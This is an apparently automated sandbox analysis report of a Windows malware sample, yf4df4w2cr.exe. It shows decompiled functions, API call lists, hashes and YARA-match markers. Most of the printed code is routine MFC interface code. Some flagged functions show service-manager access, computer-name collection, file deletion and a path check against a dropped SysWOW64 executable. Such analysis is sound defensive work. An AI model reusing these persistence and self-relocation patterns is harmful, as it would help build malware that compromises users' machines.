                  • Opcode ID: 37fd7985b59ad76bee6088d2c9caf6a5d7f3d4e0e91ea3f81cef1c7659260bcd
                  • Instruction ID: 359547d3396ca64b357bdbba5d42c68a2efe29caa3992aa9148c66dea141a309
                  • Opcode Fuzzy Hash: 37fd7985b59ad76bee6088d2c9caf6a5d7f3d4e0e91ea3f81cef1c7659260bcd
                  • Instruction Fuzzy Hash: FC014676201128FBCB128F50EC04EDF3BB9FF49354F11402AF9059A154DB79EA95DBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040CC1D, Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040CC1D(struct HWND__* _a4, int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _t9;
				signed int _t11;
				long _t20;

				_t9 = GetWindowLongA(_a4, _a8);
				_t20 =  !_a12 & _t9 | _a16;
				if(_t9 != _t20) {
					SetWindowLongA(_a4, _a8, _t20); // executed
					_t11 = _a20;
					if(_t11 != 0) {
						SetWindowPos(_a4, 0, 0, 0, 0, 0, _t11 | 0x00000017);
					}
					return 1;
				}
				return 0;
			}






                  0x0040cc28
                  0x0040cc35
                  0x0040cc3a
                  0x0040cc47
                  0x0040cc4d
                  0x0040cc54
                  0x0040cc62
                  0x0040cc62
                  0x00000000
                  0x0040cc6a
                  0x00000000

                  APIs
                  • GetWindowLongA.USER32 ref: 0040CC28
                  • SetWindowLongA.USER32 ref: 0040CC47
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,?,?,0040CC87,?,000000F0,?,?,?,?,00412B88), ref: 0040CC62
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Long
                  • String ID:
                  • API String ID: 847901565-0
                  • Opcode ID: d7c2172bb452d81a81af7510caec739e104399fd7b84e5bb0e8eb3e9bcce2491
                  • Instruction ID: 8d151290716614a4af326467620842b1de0e6c172b2ec37ab7e21d59d9d88d99
                  • Opcode Fuzzy Hash: d7c2172bb452d81a81af7510caec739e104399fd7b84e5bb0e8eb3e9bcce2491
                  • Instruction Fuzzy Hash: 93F08C75120008FFEF088F71DC998AE3B69FB18312B404539F80AC5160DB31DC61DA68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023ED652, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 34stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 023ECE90: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,023ED662,00000102,023EAC19,?,023EAC8F), ref: 023ECE99
                    • Part of subcall function 023ECE90: CloseServiceHandle.ADVAPI32(00000000,?,023EAC8F), ref: 023ECEAE
                    • Part of subcall function 023ECE6E: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\yf4df4w2cr.exe,00000104,?,00000102,023ED667,00000102,023EAC19,?,023EAC8F), ref: 023ECE87
                    • Part of subcall function 023ED0EA: CreateFileW.KERNELBASE(C:\Users\user\Desktop\yf4df4w2cr.exe,80000000,00000001,00000000,00000003,00000000,00000000,00000102,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED0FF
                    • Part of subcall function 023ED0EA: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED114
                    • Part of subcall function 023ED0EA: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED126
                    • Part of subcall function 023ED0EA: GetFileSize.KERNEL32(00000000,00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED135
                    • Part of subcall function 023ED0EA: UnmapViewOfFile.KERNEL32(00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED14B
                    • Part of subcall function 023ED0EA: FindCloseChangeNotification.KERNELBASE(00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED152
                    • Part of subcall function 023ED0EA: CloseHandle.KERNEL32(00000000,?,?,023ED676,00000102,023EAC19,?,023EAC8F), ref: 023ED159
                    • Part of subcall function 023ED163: GetComputerNameW.KERNEL32(?,?), ref: 023ED179
                    • Part of subcall function 023ED163: WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 023ED1A6
                    • Part of subcall function 023ED013: DeleteFileW.KERNELBASE(?), ref: 023ED0DD
                  • lstrcmpiW.KERNEL32(C:\Users\user\Desktop\yf4df4w2cr.exe,C:\Windows\SysWOW64\fwdrrebrand.exe,00000102,023EAC19,?,023EAC8F), ref: 023ED68B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Close$CreateHandleNameView$ByteChangeCharComputerDeleteFindManagerMappingModuleMultiNotificationOpenServiceSizeUnmapWidelstrcmpi
                  • String ID: C:\Users\user\Desktop\yf4df4w2cr.exe$C:\Windows\SysWOW64\fwdrrebrand.exe
                  • API String ID: 3833967445-615456372
                  • Opcode ID: c8b25010dfd696d3d4755c6d91f75331de6b9ed52a0a97198c81cfa6a7479143
                  • Instruction ID: a826fe385200487ca9e7c6880e6adc8f1bc770dfa9821c5f826febc770f71b7b
                  • Opcode Fuzzy Hash: c8b25010dfd696d3d4755c6d91f75331de6b9ed52a0a97198c81cfa6a7479143
                  • Instruction Fuzzy Hash: 2FF0A7A5E54238DAEEB8BBF9740475E234F4F50B20F144817E54B811C5DF70584E8D66
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00412D87, Relevance: 4.5, APIs: 3, Instructions: 34stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00412D87(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t22;
				int _t24;
				void* _t36;
				void* _t38;

				_push(4);
				E00431A9B(E0044BD4B, __ebx, __edi, __esi);
				_t36 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
					E004014C0(_t38 - 0x10, __edx);
					 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x50)))) + 0x8c))(_t38 - 0x10);
					E004048ED(__ebx,  *((intOrPtr*)(_t36 + 0x50)), __edi, _t36,  *(_t38 + 8),  *(_t38 + 0xc),  *((intOrPtr*)(_t38 - 0x10)), 0xffffffff);
					_t22 = lstrlenA( *(_t38 + 8));
					E004010B0( *((intOrPtr*)(_t38 - 0x10)) + 0xfffffff0, _t38 - 0x10);
					_t24 = _t22;
				} else {
					_t24 = GetWindowTextA( *(__ecx + 0x20),  *(_t38 + 8),  *(_t38 + 0xc)); // executed
				}
				return E00431B73(_t24);
			}







                  0x00412d87
                  0x00412d8e
                  0x00412d93
                  0x00412d99
                  0x00412daf
                  0x00412db9
                  0x00412dc1
                  0x00412dd2
                  0x00412ddd
                  0x00412deb
                  0x00412df0
                  0x00412d9b
                  0x00412da4
                  0x00412da4
                  0x00412df7

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3TextWindowlstrlen
                  • String ID:
                  • API String ID: 3549226942-0
                  • Opcode ID: b5af1ba532699d5a23646d4f2a5d320556d6468073c30116d0ca7540ada9b271
                  • Instruction ID: c23bc98a17ab587e4b111167bb2d42125b64d8fed7f86c3939704ddc0647063a
                  • Opcode Fuzzy Hash: b5af1ba532699d5a23646d4f2a5d320556d6468073c30116d0ca7540ada9b271
                  • Instruction Fuzzy Hash: 40011D35400214EFCF01AFA5CC49EAE7B71BF04328F008A69F5255A2B1DB759961DB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023EAC49, Relevance: 4.5, APIs: 3, Instructions: 30synchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • GetTickCount.KERNEL32 ref: 023EAC51
                    • Part of subcall function 023EA88E: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 023EA8A3
                    • Part of subcall function 023EA88E: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,023F0D98,00000000,00000000,00000000,00000000), ref: 023EA8E6
                    • Part of subcall function 023EA9FC: WaitForSingleObject.KERNEL32(00000000,?,00000000,023EAC6C), ref: 023EAA10
                    • Part of subcall function 023EA9FC: SignalObjectAndWait.KERNEL32(000000FF,00000000,?,00000000,023EAC6C), ref: 023EAA44
                    • Part of subcall function 023EA9FC: ResetEvent.KERNEL32(?,00000000,023EAC6C), ref: 023EAA58
                    • Part of subcall function 023EA9FC: ReleaseMutex.KERNEL32(?,00000000,023EAC6C), ref: 023EAA66
                    • Part of subcall function 023EA9FC: CloseHandle.KERNEL32(?,00000000,023EAC6C), ref: 023EAA72
                  • WaitForSingleObject.KERNEL32(00000FA0), ref: 023EAC7D
                  • WaitForSingleObject.KERNEL32(00000000), ref: 023EAC96
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: ObjectWait$Single$CloseCountDirectoryEventHandleInformationMutexReleaseResetSignalTickVolumeWindows
                  • String ID:
                  • API String ID: 1052563600-0
                  • Opcode ID: 58f141778b64f99be8d601665060432e944aa389585edb9b3be52f2b427669f3
                  • Instruction ID: 2ea87b503bdf96a39e2d604dbec0fce22db93252f35da89694c655f02d2e72b3
                  • Opcode Fuzzy Hash: 58f141778b64f99be8d601665060432e944aa389585edb9b3be52f2b427669f3
                  • Instruction Fuzzy Hash: 77E02BB09441209BDB682728BC088BA779FFB04311F8546B5FD5FD11C9DF106C288DE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404CF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E00404CF2(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				signed int _t16;
				void* _t17;
				struct HWND__* _t19;
				signed int _t24;
				signed int _t27;
				void* _t38;
				signed int _t44;

				_push(__ecx);
				_push(__ecx);
				_t12 = _a8;
				_t38 = __ecx;
				_t27 = 0x56000001;
				if(_t12 != 0) {
					_v12 =  *((intOrPtr*)(_t12 + 4));
				} else {
					_v12 = 0;
				}
				_t16 =  *(_a4 + 0x20) & 0x00300000;
				_v8 = 0xff00;
				if(_t16 != 0) {
					_t24 = _t16 | 0x56000001;
					_t44 = _t24;
					_t27 = _t24;
					E00412B6C(_t38, 0x300000, 0, 0x28);
				}
				_t17 = E0041F363(_t27, 0, _t38, _t44);
				_push( &_v12);
				_push( *((intOrPtr*)(_t17 + 8)));
				_push(0xe900);
				_push( *((intOrPtr*)(_t38 + 0x20)));
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t27);
				_push(0);
				_push("mdiclient");
				_push(0x200); // executed
				_t19 = E0040492C(_t27,  &_v12, 0, _t38, _t44); // executed
				 *(_t38 + 0xe8) = _t19;
				if(_t19 != 0) {
					BringWindowToTop(_t19);
					__eflags = 1;
					return 1;
				} else {
					return 0;
				}
			}

















                  0x00404cf7
                  0x00404cf8
                  0x00404cf9
                  0x00404cff
                  0x00404d08
                  0x00404d0c
                  0x00404d16
                  0x00404d0e
                  0x00404d0e
                  0x00404d0e
                  0x00404d24
                  0x00404d26
                  0x00404d2d
                  0x00404d31
                  0x00404d31
                  0x00404d37
                  0x00404d39
                  0x00404d39
                  0x00404d3e
                  0x00404d49
                  0x00404d4a
                  0x00404d4b
                  0x00404d50
                  0x00404d53
                  0x00404d54
                  0x00404d55
                  0x00404d56
                  0x00404d57
                  0x00404d58
                  0x00404d59
                  0x00404d5e
                  0x00404d63
                  0x00404d6e
                  0x00404d76
                  0x00404d7d
                  0x00404d85
                  0x00000000
                  0x00404d78
                  0x00000000
                  0x00404d78

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: BringWindow
                  • String ID: mdiclient
                  • API String ID: 1361440306-1999401180
                  • Opcode ID: c63c0ab9442a39a1b7a5d865660d12e39dd1592865cc440c57b5c986c44ef623
                  • Instruction ID: 6620486015e60b6a059689b7e1a8a8747eecd99153f1f0efe6d475f075f97d44
                  • Opcode Fuzzy Hash: c63c0ab9442a39a1b7a5d865660d12e39dd1592865cc440c57b5c986c44ef623
                  • Instruction Fuzzy Hash: 8D11A0B1A102047BD7248BA6CC89E6BBAECEFD9714F10442AB505D72A1E5B498008624
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00407991, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00407991(void* __ebx, void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, char _a16, intOrPtr _a32) {
				struct tagRECT _v20;
				void* __edi;
				void* __esi;
				signed int _t17;
				void* _t24;
				signed int _t28;
				void* _t29;
				signed int* _t31;
				void* _t34;
				signed int _t40;

				_t29 = __ebx;
				_t34 = __ecx;
				E00406AAE( &_a16);
				_t35 = _a12;
				_t17 = _a12 & 0x0040ffff;
				_t31 = __ecx + 0x84;
				 *_t31 = _t17;
				if(_a32 == 0xe800) {
					_t28 = _t17 | 0x00000008;
					_t40 = _t28;
					 *_t31 = _t28;
				}
				E00411F96(_t29, _t31, _t34, _t35, _t40, 0x1000); // executed
				E0040791D(_t31, _t34); // executed
				E004064F0(_t31); // executed
				SetRectEmpty( &_v20);
				_t24 = E0040D84A(_t34, "ToolbarWindow32", 0, _t35 & 0xffbf004e | _a8 | 0x0000004e,  &_v20, _a4, _a32, 0); // executed
				if(_t24 != 0) {
					E00406DB6(_t34,  *((intOrPtr*)(_t34 + 0xb0)),  *((intOrPtr*)(_t34 + 0xb4)),  *((intOrPtr*)(_t34 + 0xa8)),  *((intOrPtr*)(_t34 + 0xac)));
					return 1;
				}
				return _t24;
			}













                  0x00407991
                  0x0040799f
                  0x004079a1
                  0x004079a6
                  0x004079ab
                  0x004079b7
                  0x004079bd
                  0x004079bf
                  0x004079c1
                  0x004079c1
                  0x004079c4
                  0x004079c4
                  0x004079cb
                  0x004079d0
                  0x004079d5
                  0x004079de
                  0x00407a06
                  0x00407a0d
                  0x00407a29
                  0x00000000
                  0x00407a30
                  0x00407a34

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EmptyRect
                  • String ID: ToolbarWindow32
                  • API String ID: 2270935405-4104838417
                  • Opcode ID: fb5b6df229c39a1bc564c3f4343866c0a1e9980edddc86798078d9dc56cba60c
                  • Instruction ID: 505957d6a176a6e826c3b6042989fcaafd5f8927dda6a395bbae33c2c064a4d4
                  • Opcode Fuzzy Hash: fb5b6df229c39a1bc564c3f4343866c0a1e9980edddc86798078d9dc56cba60c
                  • Instruction Fuzzy Hash: 9C11A572710209BBDF11AFA1CC01BDA7B69FF85358F014436F915B61D1DB38A825CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040B954, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040B954(void* __ebx, void* __ecx, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				struct tagRECT _v20;
				void* __edi;
				void* __esi;
				signed int _t11;
				void* _t21;
				void* _t22;
				signed int _t29;
				void* _t32;
				signed int _t37;

				_t22 = __ebx;
				_t11 = _a12;
				_t32 = __ecx;
				 *(__ecx + 0x84) = _t11 & 0x0040ffff;
				_t26 = _a4;
				_t29 = _t11 & 0xffbf004e | 0x0000004e;
				if((E00412B38(_a4) & 0x00040000) != 0) {
					_t37 = _t29;
				}
				E00411F96(_t22, _t26, _t29, _t32, _t37, 0x1000);
				SetRectEmpty( &_v20);
				_t21 = E0040D84A(_t32, "msctls_statusbar32", 0, _a8 | _t29,  &_v20, _a4, _a16, 0); // executed
				return _t21;
			}












                  0x0040b954
                  0x0040b959
                  0x0040b960
                  0x0040b96f
                  0x0040b975
                  0x0040b97c
                  0x0040b988
                  0x0040b98a
                  0x0040b98a
                  0x0040b995
                  0x0040b99e
                  0x0040b9bf
                  0x0040b9c7

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • SetRectEmpty.USER32(?), ref: 0040B99E
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EmptyLongRectWindow
                  • String ID: msctls_statusbar32
                  • API String ID: 2293799620-4095915827
                  • Opcode ID: 85e7e89a38f6645222136ab41357720aa548ffbfdea95d73971b2ef4f0f8a088
                  • Instruction ID: 468b7fd0b6eacb9e28decebd9ac57333f4eba2f844c003510548747924e0c593
                  • Opcode Fuzzy Hash: 85e7e89a38f6645222136ab41357720aa548ffbfdea95d73971b2ef4f0f8a088
                  • Instruction Fuzzy Hash: 36F0C87270024967DB10EFA9DC06FEB3799EB84754F04443AFA19E71C1CAB8E8548658
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041346C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041346C(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t21;

				_t20 = __edi;
				_t18 = __ecx;
				_t17 = __ebx;
				_t22 = _a4;
				_t21 = __ecx;
				if(_a4 == 0) {
					E00406436(__ebx, __ecx, __edi, __ecx, _t22);
				}
				_t10 = _a8 & 0x0040ffff;
				 *(_t21 + 0x84) = _a8 & 0x0040ffff;
				E00411F96(_t17, _t18, _t20, _t21, _t10, 2);
				SetRectEmpty( &_v20);
				_t15 = E0040D84A(_t21, "AfxControlBar90s", 0, _a8,  &_v20, _a4, _a12, 0); // executed
				return _t15;
			}








                  0x0041346c
                  0x0041346c
                  0x0041346c
                  0x00413474
                  0x00413479
                  0x0041347b
                  0x0041347d
                  0x0041347d
                  0x00413485
                  0x0041348c
                  0x00413492
                  0x0041349b
                  0x004134b9
                  0x004134c0

                  APIs
                  • SetRectEmpty.USER32(?), ref: 0041349B
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EmptyException@8H_prolog3RectThrow
                  • String ID: AfxControlBar90s
                  • API String ID: 1106273639-4082281646
                  • Opcode ID: 0fe03d747cc36f8c21c24473658bc4f8ca051e35eeafd5a74ad71c3be61d63ab
                  • Instruction ID: 904d40750636b72848055661a794ad6f36defb35cdb82f78ac122cc83c2a69a9
                  • Opcode Fuzzy Hash: 0fe03d747cc36f8c21c24473658bc4f8ca051e35eeafd5a74ad71c3be61d63ab
                  • Instruction Fuzzy Hash: 49F0823250021ABBDF20AFA5CC06FDE3B69FB40314F10842BF914AA1C1DA7895548758
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E10DC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24fileCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteFileW.KERNELBASE(?), ref: 023E1120
                  Strings
                  • C:\Windows\SysWOW64\fwdrrebrand.exe, xrefs: 023E10FD
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile
                  • String ID: C:\Windows\SysWOW64\fwdrrebrand.exe
                  • API String ID: 4033686569-640560957
                  • Opcode ID: ad47f1fe805382f4c79d546fd07777c89679d1b14abac8290670a6d98f7a734e
                  • Instruction ID: 8642d73c5bbb76fb491ee4fa5c2997b03a62a29dd84fc22f192483507b850f08
                  • Opcode Fuzzy Hash: ad47f1fe805382f4c79d546fd07777c89679d1b14abac8290670a6d98f7a734e
                  • Instruction Fuzzy Hash: 2CE02071D4032893DF6076A86C0DADB375DCB40310F0005D1EADFA3181EE745D284BD5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404461, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 27%
                  			E00404461(void* __eflags, intOrPtr _a4) {
				void* _t3;
				intOrPtr* _t4;
				void* _t7;
				void* _t10;
				void* _t11;
				void* _t12;

				while(1) {
					_t3 = E0043108C(_t7, _t10, _t11, _a4); // executed
					_t12 = _t3;
					if(_t12 != 0) {
						break;
					}
					_t4 =  *0x462298; // 0x404445
					if(_t4 != 0) {
						_push(_a4);
						if( *_t4() != 0) {
							continue;
						}
					}
					break;
				}
				return _t12;
			}









                  0x0040447c
                  0x0040447f
                  0x00404484
                  0x00404489
                  0x00000000
                  0x00000000
                  0x00404469
                  0x00404470
                  0x00404472
                  0x0040447a
                  0x00000000
                  0x00000000
                  0x0040447a
                  0x00000000
                  0x00404470
                  0x0040448f

                  APIs
                  • _malloc.LIBCMT ref: 0040447F
                    • Part of subcall function 0043108C: __FF_MSGBANNER.LIBCMT ref: 004310AF
                    • Part of subcall function 0043108C: __NMSG_WRITE.LIBCMT ref: 004310B6
                    • Part of subcall function 0043108C: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,004381A2,00000001,00000001,00000001,?,0043A049,00000018,0045E2A8,0000000C,0043A0DA), ref: 00431103
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AllocateHeap_malloc
                  • String ID: ED@
                  • API String ID: 501242067-1809407400
                  • Opcode ID: 6e25af06defa9b9827857281b9dce4e04c166c3dc53613bcea4009c0ca779b1c
                  • Instruction ID: 390a9ce1f592537ae75951aa16ff758075523778642dbaca2e903489ec7b59e7
                  • Opcode Fuzzy Hash: 6e25af06defa9b9827857281b9dce4e04c166c3dc53613bcea4009c0ca779b1c
                  • Instruction Fuzzy Hash: D0D0C2722041256B8A1055AAEC10A5A7758CBC07F07080137FE08E62A0DA75DC0142C9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416609, Relevance: 3.1, APIs: 2, Instructions: 116windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E00416609(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t53;
				void* _t55;
				intOrPtr _t69;
				void* _t72;
				intOrPtr _t76;
				void* _t80;
				void* _t83;

				_t72 = __edx;
				_push(4);
				E00431A9B(E0044B3E2, __ebx, __edi, __esi);
				_t79 = __ecx;
				_t76 =  *((intOrPtr*)(_t80 + 8));
				_t36 =  *((intOrPtr*)(_t76 + 0x14));
				 *((intOrPtr*)(_t80 - 0x10)) = 1;
				if(_t36 == 0) {
					_t37 = E0041F363(0, _t76, __ecx, __eflags);
					_t39 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) + 0xc))(0xe100, 0, 0, 0);
					__eflags = _t39;
					if(_t39 == 0) {
						E00417F31(_t79);
					}
					__eflags =  *((intOrPtr*)(_t79 + 0x20));
					L29:
					if(__eflags != 0) {
						L31:
						return E00431B73( *((intOrPtr*)(_t80 - 0x10)));
					}
					L30:
					 *((intOrPtr*)(_t80 - 0x10)) = 0;
					goto L31;
				}
				_t83 = _t36 - 1;
				if(_t83 == 0) {
					_push( *((intOrPtr*)(_t76 + 0x18)));
					__eflags =  *((intOrPtr*)( *__ecx + 0x88))();
					goto L29;
				}
				if(_t83 <= 0) {
					goto L31;
				}
				if(_t36 <= 3) {
					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
					_push( *((intOrPtr*)(_t76 + 0x18)));
					_t46 =  *((intOrPtr*)( *__ecx + 0x88))();
					__eflags = _t46;
					if(_t46 != 0) {
						_t47 =  *((intOrPtr*)(__ecx + 0x20));
						 *((intOrPtr*)(__ecx + 0x8c)) = _t76;
						__eflags = _t47;
						if(__eflags == 0) {
							_t47 = E00406436(0, __ecx, _t76, __ecx, __eflags);
						}
						SendMessageA( *(_t47 + 0x20), 0x111, 0xe108, 0);
						 *((intOrPtr*)(_t79 + 0x8c)) = 0;
					}
					goto L30;
				}
				if(_t36 == 4) {
					 *((intOrPtr*)(__ecx + 0x8c)) =  *((intOrPtr*)(__ecx + 0x4c));
					 *((intOrPtr*)(__ecx + 0x4c)) = 0;
					goto L31;
				}
				if(_t36 == 5) {
					 *((intOrPtr*)( *__ecx + 0x80))();
					 *((intOrPtr*)(_t80 - 0x10)) = 0;
					__eflags =  *((intOrPtr*)(__ecx + 0x8c));
					if(__eflags != 0) {
						goto L31;
					}
					_t69 = E00404461(__eflags, 0x28);
					 *((intOrPtr*)(_t80 + 8)) = _t69;
					 *((intOrPtr*)(_t80 - 4)) = 0;
					L16:
					_t91 = _t69;
					if(_t69 == 0) {
						_t53 = 0;
						__eflags = 0;
					} else {
						_t53 = E0041576C(_t69, _t91);
					}
					 *((intOrPtr*)(_t79 + 0x8c)) = _t53;
					 *((intOrPtr*)(_t53 + 0x14)) = 6;
					goto L31;
				}
				if(_t36 != 6) {
					goto L31;
				}
